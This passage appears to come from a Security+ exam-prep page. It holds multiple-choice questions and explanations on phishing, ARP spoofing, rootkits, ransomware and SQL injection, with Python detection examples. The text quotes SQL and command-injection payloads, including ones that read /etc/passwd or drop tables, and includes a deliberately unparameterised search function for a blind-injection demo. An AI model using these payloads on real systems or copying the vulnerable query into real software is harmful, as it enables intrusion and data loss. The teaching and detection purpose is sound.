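                                 "sub_len": 0, "entropy": 0.0, "subdomains": set()})
    for line in lines:
        _ts, client, qname, qtype, rcode = line.split()
        parent, sub = split_name(qname)
        s = stats[(client, parent)]
        s["queries"] += 1
        s["nxdomain"] += rcode == "NXDOMAIN"
        s["txt"] += qtype == "TXT"
        s["sub_len"] += len(sub)
        s["entropy"] += shannon_entropy(sub.replace(".", ""))
        s["subdomains"].add(sub)
    return stats


def flag_tunneling(stats, min_queries=5, min_avg_len=30, min_avg_entropy=3.5, min_unique=0.9):
    """Flag client/domain pairs whose subdomains are long, high-entropy and
    almost never repeated: the fingerprint of data encoded into queries."""
    flagged = []
    for (client, parent), s in stats.items():
        n = s["queries"]
        if n < min_queries:
            continue
        avg_len, avg_ent = s["sub_len"] / n, s["entropy"] / n
        unique = len(s["subdomains"]) / n
        if avg_len >= min_avg_len and avg_ent >= min_avg_entropy and unique >= min_unique:
            flagged.append({"client": client, "domain": parent, "queries": n,
                            "avg_subdomain_len": round(avg_len, 1),
                            "avg_entropy": round(avg_ent, 2),
                            "nxdomain_ratio": round(s["nxdomain"] / n, 2),
                            "txt_ratio": round(s["txt"] / n, 2)})
    return flagged


if __name__ == "__main__":
    for hit in flag_tunneling(profile_dns(SAMPLE_LOG)):
        print(hit)
```

The NXDOMAIN and TXT ratios are reported rather than used as hard conditions because a tunnel that answers with NOERROR A records still has the long, unique, high-entropy labels; the host doing normal lookups fails on subdomain length and uniqueness even though its query count is the same.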
A security analyst is reviewing logs after a successful phishing attack. The attacker used a fake login page that mimicked the company's single sign-on portal to harvest usernames and passwords. The attacker then used the stolen credentials to access the corporate email system. Which type of attack best describes the initial compromise?
A.On-path attack
B.Credential harvesting via phishing
C.Brute-force attack
D.Password spraying
AnswerB
Correct. The attacker used a deceptive email or website to trick users into voluntarily entering their credentials. This is the defining characteristic of phishing-based credential harvesting. The stolen credentials were then reused to access the corporate email system.
Why this answer
The initial compromise was achieved by luring the victim to a fake login page that mimicked the company's single sign-on portal, which is a classic phishing technique. The attacker harvested the credentials directly from the user's submission, making this a credential harvesting attack via phishing. This aligns with the definition of phishing as a social engineering attack that uses deception to obtain sensitive information, distinct from brute-force or password spraying which rely on guessing or trying multiple passwords.
Exam trap
The trap here is that candidates may confuse credential harvesting via phishing with an on-path attack, because both end with the attacker holding the user's credentials, but phishing relies on user deception to voluntarily submit credentials, whereas an on-path attack captures them transparently during an existing session.
How to eliminate wrong answers
Option A is wrong because an on-path attack (formerly man-in-the-middle) intercepts and potentially modifies communications between two parties in real time, whereas here the attacker used a fake page to collect credentials directly from the user, not by intercepting an existing session. Option C is wrong because a brute-force attack systematically tries all possible password combinations against a known username, which is not what occurred; the attacker harvested valid credentials from the user, not guessed them. Option D is wrong because password spraying attempts a few common passwords against many usernames to avoid lockouts, but in this scenario the attacker obtained the exact credentials from the victim via a deceptive login page, not by guessing passwords across accounts.
A scan finds two issues: a critical flaw on a lab server reachable only through VPN, and a high-severity flaw on an internet-facing file transfer appliance with active exploitation in the wild. Which should be remediated first?
A.The lab server, because critical severity is always higher than high severity.
B.The internet-facing file transfer appliance, because exploitability and exposure increase risk.
C.Both issues at the same time, because prioritization is unnecessary when two findings are present.
D.The lab server, because systems behind VPN are always more trusted than public systems.
AnswerB
The internet-facing appliance should be fixed first because it is exposed to untrusted users and already being exploited in the wild. Risk-based prioritization considers not only severity but also exposure, exploit availability, and business impact. A high-severity flaw with active exploitation on a public-facing system is usually more urgent than a critical flaw on a restricted lab server.
Why this answer
The internet-facing file transfer appliance with active exploitation in the wild presents a higher risk because it is directly exposed to untrusted networks and has a known exploit that attackers are actively using. Even though the lab server has a critical severity rating, its reachability only through VPN significantly reduces its attack surface and likelihood of exploitation. Risk is a function of both severity and exploitability/exposure, so the actively exploited, internet-facing asset should be remediated first.
Exam trap
The trap here is that candidates assume CVSS severity alone dictates remediation order, ignoring that exploitability and exposure (e.g., internet-facing vs. VPN-restricted) are critical factors in risk-based prioritization.
How to eliminate wrong answers
Option A is wrong because severity alone does not determine remediation priority; a critical flaw on a VPN-restricted lab server is less exploitable than a high-severity flaw on an internet-facing system with active exploitation. Option C is wrong because prioritization is essential when resources are limited; remediating both simultaneously is often impractical and ignores the higher immediate risk posed by the actively exploited internet-facing appliance. Option D is wrong because VPN access limits exposure but does not make a system trustworthy; a compromised remote endpoint or a stolen VPN credential still reaches the lab server, so the lab finding is scheduled after the appliance, not dismissed.
A security analyst is reviewing web server logs from an e-commerce application. The logs show repeated requests containing URLs with appended strings such as: `' OR '1'='1' --` and `'; DROP TABLE Users; --`. The application returned HTTP 200 responses with unexpected data in several instances. Which type of attack is most likely being attempted?
A.SQL injection
B.LDAP injection
C.Command injection
D.Cross-site scripting (XSS)
AnswerA
Correct. The log entries show SQL syntax such as `OR '1'='1'` and `DROP TABLE`, which are classic indicators of SQL injection attempts. This attack exploits improper input sanitization to manipulate database queries.
Why this answer
The repeated requests contain classic SQL injection payloads, such as `' OR '1'='1' --` (used to bypass authentication or extract data) and `'; DROP TABLE Users; --` (used to delete database tables). The HTTP 200 responses with unexpected data suggest that the injected SQL is reaching the backend database and altering query results; the status code on its own proves nothing, since many applications return 200 for a rejected query, so the unexpected content is the stronger signal. This attack targets the SQL database layer, not LDAP directories or operating system commands.
Exam trap
The trap here is that candidates may confuse SQL injection with command injection because both use special characters like `'` and `;`, but command injection requires OS command separators and system commands, whereas SQL injection uses database-specific syntax and keywords.
How to eliminate wrong answers
Option B (LDAP injection) is wrong because the payloads contain SQL syntax (e.g., `OR '1'='1'`, `DROP TABLE`), whereas LDAP injection uses LDAP filter syntax such as `(&(uid=*)(userPassword=*))`. Option C (Command injection) is wrong because, although the second payload contains a `;`, it is acting as a SQL statement terminator introducing another SQL statement (`DROP TABLE`), not an OS command separator followed by a system command (e.g., `; whoami`, `&& cat /etc/passwd`, `| id`); likewise the `--` that ends each payload is the SQL comment marker, not shell syntax.
A help desk technician receives a call from someone claiming to be a new contractor whose MFA app failed during travel. The caller knows the company org chart, names the technician's supervisor, and says the technician should use a callback number included in a text message they just sent. What is the safest first action?
A.Reset MFA immediately, since the caller has provided enough internal details to seem credible.
B.Ask the caller to read a one-time code aloud so the technician can confirm their identity.
C.End the call and verify the request through a published help desk number or ticketing system.
D.Approve the request if the caller can name the supervisor and the contractor's project team.
AnswerC
The safest first action is to stop using information supplied by the caller and verify through a trusted, independently obtained contact path. Because the attacker already knows internal details and provided a callback number in a text, those channels cannot be trusted. Using a published help desk number or the official ticketing system keeps risk to a minimum and prevents social engineering from extending into account reset abuse.
Why this answer
Option C is correct because the safest first action when receiving an unsolicited call requesting privileged actions (like MFA reset) is to independently verify the request through official channels. The caller's knowledge of internal details (org chart, supervisor name) and the request to use a callback number from a text message are classic social engineering red flags, as the callback number could be attacker-controlled. Hanging up and calling back via a published help desk number ensures the request is legitimate and prevents MFA bypass or account takeover.
Exam trap
The trap here is that candidates may assume the caller's knowledge of internal details (supervisor name, org chart) is sufficient proof of identity, but CompTIA tests the principle that any unsolicited request for privileged actions must be independently verified through a trusted channel, not through information the caller provides.
How to eliminate wrong answers
Option A is wrong because resetting MFA immediately based on internal details alone is dangerous; attackers can gather org charts and supervisor names via OSINT or previous breaches, and an MFA reset is a high-risk action that should require verified identity. Option B is wrong because a code read aloud only proves that the caller holds some device that received a code; it cannot be tied to the identity being claimed, the caller has already said their MFA app is not working, and asking a user to relay a one-time code is itself the technique attackers use to phish MFA, so training staff to treat it as verification is harmful. Option D is wrong because naming a supervisor and project team is not authentication; these details are often publicly available or easily guessed, and approving the request on that basis skips identity verification entirely and hands the caller access to an account.
Users on a wired subnet report intermittent outages when reaching an internal application. A packet capture shows the default gateway IP address repeatedly mapped to a different workstation MAC address, and traffic is being forwarded through that workstation. What attack is most likely occurring?
A.DNS poisoning, because the hostname is resolving to the wrong server.
B.ARP spoofing, because false Layer 2 address mappings are redirecting traffic.
C.Replay attack, because packets are being resent to the gateway.
D.Rogue DHCP service, because clients are losing access to the default gateway.
AnswerB
ARP spoofing, also called ARP poisoning, happens when a host sends forged ARP messages that associate a target IP address with the attacker’s MAC address. In this case, the gateway IP is repeatedly being mapped to a workstation MAC, and traffic is being relayed through that workstation. That is a classic man-in-the-middle setup on a local network segment.
Why this answer
B is correct because ARP spoofing (also known as ARP poisoning) involves an attacker sending forged ARP messages over a local area network. This results in the attacker's MAC address being associated with the IP address of the default gateway, causing traffic destined for the gateway to be forwarded to the attacker's workstation instead. The packet capture evidence of the default gateway IP repeatedly mapped to a different workstation MAC address is the classic signature of this attack.
Exam trap
The trap here is that candidates often confuse ARP spoofing with DNS poisoning because both involve redirecting traffic, but ARP spoofing operates at Layer 2 (MAC address manipulation) while DNS poisoning operates at Layer 7 (hostname resolution).
How to eliminate wrong answers
Option A is wrong because DNS poisoning involves corrupting the DNS resolver cache or DNS server records to map a domain name to an incorrect IP address, not manipulating Layer 2 MAC-to-IP mappings on a local subnet. Option C is wrong because a replay attack involves capturing and retransmitting valid data packets to trick the receiver, not altering ARP tables to redirect traffic through a rogue host. Option D is wrong because a rogue DHCP service would assign incorrect IP configuration (including a fake gateway IP) to clients, but the symptom described is a specific MAC-to-IP mapping conflict for the existing gateway, not a DHCP lease issue.
A Linux server is missing expected security-agent processes, but users can still connect to the application. Local command output does not show a suspicious daemon that another monitoring tool says is listening on port 4444. A raw disk scan reveals a kernel module loaded at boot, and several files appear only when viewed outside the normal operating system tools. What malware type is most likely?
A.Trojan, because it could have introduced the suspicious service after the initial compromise.
B.Spyware, because it may collect data while leaving the application functional.
C.Rootkit, because kernel-level components are hiding processes and files from normal user-mode visibility.
D.Logic bomb, because the malware activates after startup and changes what administrators see.
AnswerC
A rootkit is the best answer because the evidence points to concealment at the operating system level. A kernel module loaded at boot, missing processes in standard listings, and files visible only through raw disk examination all indicate malicious hiding behavior. Rootkits are designed to obscure other malware or unauthorized access, making them especially dangerous and difficult to detect with normal administrative tools.
Why this answer
Option C is correct because the scenario describes a rootkit: a kernel-level rootkit can load a malicious kernel module at boot, hook system calls or kernel functions (e.g., `open`, `getdents64` for directory listings, the reader behind `/proc/net/tcp`), and hide processes, files, and network listeners from user-mode tools like `ps`, `ls`, `ss`, or `netstat`. The raw disk scan reveals files invisible to normal OS tools, and the missing security-agent processes and hidden daemon on port 4444 are classic signs of kernel-mode hooking that bypasses standard visibility.
Exam trap
The trap here is that candidates may confuse a rootkit with a Trojan or spyware because all three can persist, but only a rootkit operates at kernel level to hide its artifacts from user-mode commands like `ps`, `ls`, and `netstat`.
How to eliminate wrong answers
Option A is wrong because a Trojan is a type of malware that disguises itself as legitimate software but does not inherently provide kernel-level hiding capabilities; the key evidence here is kernel module loading and file/process concealment, which is the hallmark of a rootkit, not a Trojan. Option B is wrong because spyware focuses on data collection and typically does not modify the kernel to hide its own processes or files; the described behavior of hiding a daemon and files from normal tools goes far beyond spyware's typical user-mode surveillance. Option D is wrong because a logic bomb is a payload that waits for a trigger condition (a date, a user action, a missing file) before running; it describes when code executes, not a mechanism for hiding processes, files, or listeners from administrators.
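The detection method the scenario relies on is a cross-view comparison: the same facts collected through the (possibly hooked) user-mode tools and again through a path the rootkit does not control, with any difference treated as hidden. The example below is added here and is not code from the original page; the `/proc/net/tcp` text, PID sets and module file lists are constructed, and in practice the "raw" side would come from a disk image, a PID walk that stats `/proc/<pid>` directly rather than listing the directory, or the external monitor that saw port 4444.

```python
# Constructed /proc/net/tcp content (assumed, not from the page). local_address is
# hex IP:port and st is the socket state; 0A means LISTEN. 0x0016 = 22, 0x115C = 4444.
RAW_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18231 1 0000000000000000 100 0 0 10 0
   1: 00000000:115C 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 40977 1 0000000000000000 100 0 0 10 0
   2: 0A01010A:0016 0A01010B:C3E8 01 00000000:00000000 00:00000000 00000000     0        0 19001 1 0000000000000000 20 4 30 10 -1
"""

# Views as reported by the user-mode tools on the host (constructed values) ...
PS_PIDS = {1, 412, 900, 1337}
SS_LISTEN_PORTS = {22}
LS_MODULE_FILES = {"/lib/modules/current/kernel/drivers/net/e1000.ko"}
# ... and the same facts collected another way: a PID walk via stat(), the raw
# /proc/net/tcp text above, and a raw disk scan of the same directory.
WALKED_PIDS = {1, 412, 900, 1337, 4321}
DISK_MODULE_FILES = {
    "/lib/modules/current/kernel/drivers/net/e1000.ko",
    "/lib/modules/current/kernel/drivers/net/.sysctl.ko",
}


def parse_proc_net_tcp(text: str) -> set:
    """Return the set of listening TCP ports from /proc/net/tcp text."""
    ports = set()
    for line in text.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) < 4:
            continue
        local_addr, state = fields[1], fields[3]
        if state == "0A":
            ports.add(int(local_addr.rsplit(":", 1)[1], 16))
    return ports


def cross_view(tool_pids, raw_pids, tool_ports, raw_ports, tool_files, raw_files) -> dict:
    """Anything present in the raw view but missing from the tool view is being hidden."""
    return {
        "hidden_pids": sorted(raw_pids - tool_pids),
        "hidden_ports": sorted(raw_ports - tool_ports),
        "hidden_files": sorted(raw_files - tool_files),
    }


def run_demo() -> dict:
    return cross_view(
        PS_PIDS, WALKED_PIDS,
        SS_LISTEN_PORTS, parse_proc_net_tcp(RAW_PROC_NET_TCP),
        LS_MODULE_FILES, DISK_MODULE_FILES,
    )


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

A kernel rootkit that hooks `getdents64` also filters a Python `os.listdir("/proc")` run on the same host, which is why the raw side must come from somewhere the hooked kernel is not in the path: the disk image in the scenario, or the separate monitoring tool that still saw the listener.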
A user's workstation suddenly renames documents with a new extension, displays a ransom note, and blocks access to a shared drive. Which two indicators support ransomware? Select two.
Select 2 answers
A.Files are renamed or encrypted and no longer open normally
B.A ransom note demands payment for decryption or restoration
C.The mouse pointer moves slowly after long idle periods
D.The browser homepage changed after a software update
E.A new USB keyboard is detected by the operating system
AnswersA, B
Renamed or encrypted files are a strong sign of ransomware because the malware is preventing normal access to data, and a ransom note demanding payment for decryption is the extortion step that distinguishes ransomware from other destructive malware.
Why this answer
Option A is correct because ransomware typically encrypts files and renames them with a new extension (e.g., .encrypted, .locked), making them unopenable without the decryption key. This behavior directly matches the scenario where documents are renamed and access is blocked, confirming file encryption as a core indicator of ransomware. Option B is correct because the ransom note is the defining feature of the attack: the malware announces itself and demands payment for decryption or restoration, which no other malware category does.
Exam trap
The trap here is that candidates may confuse general system performance issues (like a slow mouse) with ransomware indicators, but ransomware focuses on file encryption and ransom demands, not on input device behavior.
Based on the exhibit, what is the BEST response by the employee?
The message appears to come from a trusted internal support team, but the sender details and request do not align with normal procedures.
A.Verify the request using a known internal help desk number or portal before taking any action.
B.Reply with the six-digit code so the help desk can complete the repair quickly.
C.Open the linked repair page from the email and sign in immediately to avoid suspension.
D.Forward the message to the manager and continue using the account until the suspension occurs.
AnswerA
This message combines urgency, a mismatched reply-to address, and a request for an MFA code. Independent verification is the safest response.
Why this answer
Option A is correct because verifying the request through a known internal help desk number or portal is the standard security practice to confirm the legitimacy of any unexpected communication, especially when sender details and procedures do not align. This approach mitigates the risk of social engineering attacks, such as phishing or business email compromise (BEC), where attackers impersonate trusted entities to trick employees into revealing sensitive information or performing unauthorized actions. By using an independently verified contact method, the employee ensures they are not falling victim to a fraudulent request that could lead to account compromise or data breach.
Exam trap
The trap here is that candidates may assume the email is legitimate because it appears to come from a trusted internal source, leading them to choose an action that involves direct interaction with the email (like replying or clicking a link) rather than verifying through an independent channel, which is the core principle of social engineering defense.
How to eliminate wrong answers
Option B is wrong because replying with a six-digit code directly to the email sender could provide an attacker with a one-time passcode (OTP) or verification code, enabling them to bypass multi-factor authentication (MFA) or gain unauthorized access to the employee's account. Option C is wrong because opening a linked repair page from the email and signing in immediately could lead to a credential harvesting site that captures the employee's username and password, compromising their account. Option D is wrong because forwarding the message to the manager and continuing to use the account until suspension occurs does not prevent potential compromise; the employee remains vulnerable to further exploitation while the manager investigates, and the account could be used maliciously in the interim.
Several users on the same subnet report that their traffic to the default gateway is intermittently slow and sometimes reaches the wrong device. A packet capture shows ARP replies that map the gateway IP to a different MAC address. What attack is most likely occurring?
A.ARP spoofing, which poisons address resolution on the local network
B.DNS amplification, which overwhelms the target with reflected DNS traffic
C.Replay attack, which resends captured authentication data
D.Port scanning, which probes hosts for open services and ports
AnswerA
ARP spoofing sends false ARP information so hosts associate the gateway IP with the attacker's MAC address.
Why this answer
ARP spoofing (also known as ARP poisoning) is the correct answer because the attacker sends forged ARP replies that associate the default gateway's IP address with the attacker's MAC address. The victim hosts overwrite the gateway entry in their ARP caches with the false mapping (the switch itself keeps a MAC address table, not an ARP cache, and simply forwards frames to whichever port the attacker's MAC was learned on), so traffic destined for the gateway is instead sent to the attacker, leading to intermittent connectivity and misrouted packets. The symptoms, slow traffic and reaching the wrong device, are classic indicators of a man-in-the-middle (MITM) attack via ARP cache poisoning.
Exam trap
The trap here is that candidates confuse ARP spoofing with DNS-based attacks (like DNS amplification) because both involve 'redirecting' traffic, but ARP spoofing operates at Layer 2 (MAC address manipulation) on the local subnet, while DNS amplification is a Layer 3/4 volumetric attack that abuses open resolvers to flood a victim with reflected responses.
How to eliminate wrong answers
Option B is wrong because DNS amplification is a volumetric DDoS attack that exploits open DNS resolvers to flood a target with large responses, not a local network attack that causes traffic to reach the wrong device on the same subnet. Option C is wrong because a replay attack involves capturing and retransmitting valid authentication data (e.g., Kerberos tickets or NTLM hashes) to gain unauthorized access, not manipulating ARP tables to redirect traffic. Option D is wrong because port scanning is a reconnaissance technique used to discover open ports and services on a host, not an attack that alters the flow of traffic or causes packets to reach the wrong MAC address.
A vulnerability scan reports a critical finding on a legacy application server. The security team verifies that the flagged package is installed, but the vulnerable code path is disabled by configuration and cannot be exploited in the current deployment. The vendor will not support a patch until next quarter. What is the best next step?
A.Ignore the finding because the scanner produced a false positive
B.Request a risk exception and document compensating controls until patching is possible
C.Disable the vulnerability scanner to prevent repeated alerts
D.Immediately retire the server even though the application is still business-critical
AnswerB
This is the best response because the team has confirmed the issue cannot be immediately remediated, but the organization still needs formal risk ownership. A risk exception documents the temporary acceptance, while compensating controls capture what is being done to reduce exposure until a supported patch becomes available. That is the right balance between operational constraints and security governance.
Why this answer
Option B is correct because the vulnerability is real (the package is installed), but the risk is mitigated by a compensating control (the vulnerable code path is disabled). A risk exception formally documents this compensating control and the planned patch timeline, ensuring the finding is tracked and not forgotten. This aligns with the SY0-701 objective of managing risk through formal acceptance and compensating controls when immediate remediation is not possible.
Exam trap
The trap here is that candidates confuse a 'false positive' (scanner error) with a 'vulnerability that is mitigated by a compensating control' — the scanner is correct, but the risk is lower than the raw CVSS score suggests.
How to eliminate wrong answers
Option A is wrong because the scanner did not produce a false positive; the vulnerable package is indeed installed, and the scanner correctly identified it. The fact that the code path is disabled is a compensating control, not a false positive. Option C is wrong because disabling the vulnerability scanner would eliminate visibility into all findings, including legitimate ones, and violates security monitoring best practices.
Option D is wrong because retiring a business-critical server without a replacement or migration plan would cause unacceptable operational impact, and the risk is already mitigated by the disabled code path.
A security team suspects a rootkit after seeing hidden processes, boot-time persistence, and altered system files on a laptop. What is the best next step after confirming the suspicion?
A.Run a quick cleanup script and return the laptop to the user
B.Disconnect the laptop, then reimage it from a known-good source
C.Disable the user account and leave the device in place
D.Delete the suspected hidden files manually from Windows Explorer
AnswerB
A rootkit can hide deeply in the system, so reimaging from trusted media is the safest way to restore integrity.
Why this answer
Once a rootkit is confirmed, the system's integrity is compromised at the kernel or boot level, making any software-based cleanup unreliable. Reimaging from a known-good source ensures all malicious code, including bootkits and hidden processes, is completely eradicated. This aligns with the SY0-701 domain of incident response, where containment and eradication require a trusted baseline.
Exam trap
The trap here is that candidates may think a cleanup script or manual deletion is sufficient, but rootkits operate below the OS level, making reimaging the only reliable method to restore integrity.
How to eliminate wrong answers
Option A is wrong because a quick cleanup script cannot remove rootkits that operate at ring 0 or modify the Master Boot Record (MBR); the malware will persist or reinfect. Option C is wrong because disabling the user account does not remove the rootkit from the laptop, leaving the device compromised and potentially spreading to other systems on the network. Option D is wrong because manually deleting files from Windows Explorer cannot remove kernel-mode rootkits that hide their processes and files from user-mode tools, and it may trigger anti-forensic mechanisms.
A security team is reviewing vulnerabilities in a web application. Which three of the following are common web application vulnerabilities that should be addressed? (Choose three.)
Cross-site scripting (XSS) is a common web application vulnerability where an attacker injects malicious scripts into web pages viewed by other users, often through input fields or URL parameters. SQL injection occurs when an application improperly sanitizes user input in SQL queries, allowing attackers to manipulate the database. XML external entity (XXE) injection exploits poorly configured XML parsers to process external entities, leading to data disclosure or server-side request forgery.
Cross-site scripting and SQL injection have appeared in every OWASP Top 10 release (the 2021 list groups XSS under Injection); XXE had its own category in the 2017 list and is folded into Security Misconfiguration in 2021.
Exam trap
Cisco often tests the distinction between web application vulnerabilities (like XSS, SQLi, XXE) and network-level attacks (like ARP poisoning, DNS cache poisoning, evil twin), so candidates mistakenly select network attacks because they are familiar, but they are not specific to web applications.
Users on a branch VLAN intermittently reach a fake login page even though DNS records have not changed. A packet capture shows the default gateway MAC address changing every 60 seconds, and the switch logs list repeated unsolicited ARP replies from one workstation. Which attack is most likely?
A.DNS poisoning, because name resolution is directing users to the wrong server.
B.ARP poisoning, because forged ARP replies are associating the gateway IP with the attacker's MAC address.
C.Replay attack, because previously captured traffic is being resent to the network.
D.Denial of service, because the branch users cannot reliably reach websites.
AnswerB
ARP poisoning is the best fit because the attacker is sending unsolicited ARP replies to rewrite the local IP-to-MAC mapping. The changing gateway MAC address and repeated ARP activity are classic signs of a man-in-the-middle setup on a switched LAN. Once traffic is redirected through the attacker, fake login pages and credential interception become possible.
Why this answer
The repeated unsolicited ARP replies from one workstation, combined with the default gateway MAC address changing every 60 seconds, directly indicate an ARP poisoning attack. The attacker is sending forged ARP replies to associate the gateway IP with its own MAC address, causing traffic destined for the gateway to be intercepted. This allows the attacker to redirect users to a fake login page without altering DNS records.
Exam trap
The trap here is that candidates see 'fake login page' and 'DNS records have not changed' and jump to DNS poisoning, but the key indicator is the MAC address changing every 60 seconds, which is a classic sign of ARP poisoning, not DNS manipulation.
How to eliminate wrong answers
Option A is wrong because DNS poisoning involves altering DNS records or cache entries to redirect name resolution, but the scenario explicitly states DNS records have not changed and the packet capture shows MAC address changes, not IP resolution changes. Option C is wrong because a replay attack resends captured legitimate traffic to impersonate a user or disrupt a session, but here the attacker is actively sending unsolicited ARP replies to redirect traffic, not replaying old packets. Option D is wrong because a denial of service attack would prevent users from reaching websites entirely, but the users intermittently reach a fake login page, indicating traffic is being redirected, not blocked.
Several users on the same subnet report intermittent loss of access to the default gateway. A packet capture shows repeated unsolicited ARP replies mapping the gateway IP address to a different MAC address. Traffic is occasionally sent through an unknown workstation. What attack is most likely occurring?
ARP poisoning forges address resolution replies so victims map the gateway IP to the attacker MAC.
Why this answer
The attack is ARP poisoning (also known as ARP spoofing). The attacker sends unsolicited ARP replies to associate the gateway's IP address with the attacker's MAC address, causing traffic destined for the gateway to be redirected through the attacker's workstation. This results in intermittent connectivity as the attacker can forward or drop packets, and the repeated unsolicited replies overwrite the legitimate ARP cache entries on the victim hosts.
Exam trap
The trap here is confusing ARP poisoning with DNS cache poisoning because both involve 'poisoning' a cache, but ARP operates at Layer 2 (MAC addresses) while DNS operates at Layer 7 (domain names), and the symptoms of intermittent gateway access and unsolicited ARP replies are unique to ARP attacks.
How to eliminate wrong answers
Option B (DNS cache poisoning) is wrong because that attack corrupts DNS resolver caches to redirect domain names to malicious IP addresses, not to manipulate Layer 2 MAC-to-IP mappings via ARP. Option C (Replay attack) is wrong because a replay attack involves capturing and retransmitting valid data packets to impersonate a user or gain unauthorized access, not sending unsolicited ARP replies to redirect traffic. Option D (Amplification attack) is wrong because amplification attacks (e.g., DNS amplification, NTP amplification) exploit stateless protocols to flood a target with large responses from many servers, not to poison ARP caches on a local subnet.
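The four ARP questions above all turn on the same two capture-level signals: the gateway IP being claimed by more than one MAC, and replies arriving that no host asked for. The analyser below is an added example, not code from the original page; the gateway address, the known-good MAC (as a switch or DHCP server would record it) and the packet list are constructed to match the scenario of unsolicited replies every 60 seconds.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ArpPacket:
    t: float          # capture timestamp, seconds
    op: str           # "request" (who-has) or "reply" (is-at)
    sender_ip: str
    sender_mac: str
    target_ip: str


# Assumed values for the constructed capture: the gateway address and the
# mapping recorded for it out of band (the known-good reference).
GATEWAY_IP = "10.1.1.1"
GATEWAY_MAC = "00:11:22:aa:bb:01"
ATTACKER_MAC = "de:ad:be:ef:00:01"

# Constructed packets, not a real capture: one legitimate exchange, then
# replies for the gateway IP from another MAC every 60 seconds, plus one
# benign gratuitous ARP from an unrelated host.
SAMPLE_CAPTURE = [
    ArpPacket(0.00, "request", "10.1.1.50", "00:11:22:aa:bb:50", GATEWAY_IP),
    ArpPacket(0.01, "reply", GATEWAY_IP, GATEWAY_MAC, "10.1.1.50"),
    ArpPacket(30.0, "reply", GATEWAY_IP, ATTACKER_MAC, "10.1.1.50"),
    ArpPacket(90.0, "reply", GATEWAY_IP, ATTACKER_MAC, "10.1.1.50"),
    ArpPacket(150.0, "reply", GATEWAY_IP, ATTACKER_MAC, "10.1.1.50"),
    ArpPacket(151.0, "reply", "10.1.1.20", "00:11:22:aa:bb:20", "10.1.1.20"),
]


def analyze_arp(packets, gateway_ip, known_mac, window=2.0) -> dict:
    """Flag IP-to-MAC conflicts for the gateway and replies nobody asked for."""
    last_request = {}               # target_ip -> time of the latest who-has for it
    macs_for_ip = defaultdict(set)  # sender_ip -> every MAC that has claimed it
    unsolicited = []
    for p in sorted(packets, key=lambda p: p.t):
        if p.op == "request":
            last_request[p.target_ip] = p.t
            continue
        macs_for_ip[p.sender_ip].add(p.sender_mac)
        # A reply is solicited only if its sender IP was asked for recently.
        asked = last_request.get(p.sender_ip)
        if asked is None or p.t - asked > window:
            unsolicited.append(p)
    for_gateway = [p for p in unsolicited if p.sender_ip == gateway_ip]
    return {
        "gateway_macs": sorted(macs_for_ip[gateway_ip]),
        "rogue_macs": sorted(macs_for_ip[gateway_ip] - {known_mac}),
        "unsolicited_for_gateway": len(for_gateway),
        "suspect_senders": sorted(
            {p.sender_mac for p in for_gateway if p.sender_mac != known_mac}
        ),
    }


if __name__ == "__main__":
    print(analyze_arp(SAMPLE_CAPTURE, GATEWAY_IP, GATEWAY_MAC))
```

Gratuitous ARP is also sent legitimately (a host announcing itself, a router pair failing over), so an unsolicited reply on its own is weak evidence; a reply that contradicts the recorded gateway mapping is the signal to act on. On managed switches, Dynamic ARP Inspection backed by DHCP snooping drops these forged replies at the access port rather than leaving detection to a capture.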
A tester enters a crafted search term into an internal web application and sees no error message, but the page response always delays by exactly five seconds when the input includes a single quote followed by a conditional sleep function. The returned results look normal, so the tester repeats the request several times and the timing remains consistent. Which attack is most likely being attempted?
A.Reflected cross-site scripting, because the tester's input is being echoed back into the response.
B.Command injection, because the application is pausing while executing system-level sleep commands.
C.Time-based blind SQL injection, because the attacker is inferring database behavior from delayed responses.
D.Session fixation, because the tester is manipulating how the application handles user input over time.
AnswerC
The timing pattern is the critical clue. When an application does not reveal errors or data directly, an attacker can still infer whether injected SQL changes control flow by measuring response delays. A single quote plus a conditional sleep is a classic sign of time-based blind SQL injection. The normal-looking results and consistent pauses show the query is being influenced even without visible error output.
Why this answer
The consistent five-second delay triggered by a single quote followed by a conditional sleep function (e.g., `' OR SLEEP(5)`) indicates a time-based blind SQL injection. The tester is inferring database behavior from response timing because the application does not display error messages or output differences, but the database pauses whenever the injected condition evaluates to true. This technique exploits the database's ability to conditionally delay execution, allowing an attacker to extract data one true/false question at a time.
Exam trap
The trap here is that candidates confuse a time-based delay with command injection (Option B) because both involve a pause, but the key differentiator is the single quote syntax and the database-specific sleep function, not an OS-level command.
How to eliminate wrong answers
Option A is wrong because reflected cross-site scripting requires the tester's input to be echoed back in the HTML/JavaScript context, not a server-side delay; the absence of error messages and the consistent timing point to database-level behavior, not client-side script execution. Option B is wrong because command injection would involve system-level commands (e.g., 'ping -n 5 127.0.0.1') and typically shows a delay from the OS, not a database-specific sleep function triggered by a single quote; the application is a web application, not a command shell. Option D is wrong because session fixation involves an attacker forcing a known session ID on a victim to hijack their session later, not manipulating input to cause server-side delays; the tester's repeated requests and timing analysis are unrelated to session management.
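The inference loop itself, as an added example that is not code from the original page: a vulnerable product search is driven with a conditional delay and the elapsed time is the only oracle, recovering a secret one character at a time by binary search over its code point. SQLite has no `SLEEP()`, so a Python function named `sleep` is registered to stand in for MySQL's `SLEEP()`, PostgreSQL's `pg_sleep()` or SQL Server's `WAITFOR DELAY`; the tables, the `admin` row and the delay length are constructed for the demonstration.

```python
import sqlite3
import time

SLEEP_SECONDS = 0.1   # assumed delay per true condition (the page's scenario used 5 s)


def make_db() -> sqlite3.Connection:
    """Constructed schema and data for the demonstration (assumed, not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?)", [("lamp",), ("desk",)])
    conn.execute("CREATE TABLE users (username TEXT, api_key TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'k9z')")

    def _sleep(seconds):          # stand-in for the real databases' sleep functions
        time.sleep(seconds)
        return 1

    conn.create_function("sleep", 1, _sleep)
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    """Unparameterised search: the tester's input becomes part of the WHERE clause."""
    rows = conn.execute(f"SELECT name FROM products WHERE name LIKE '%{term}%'").fetchall()
    return [r[0] for r in rows]
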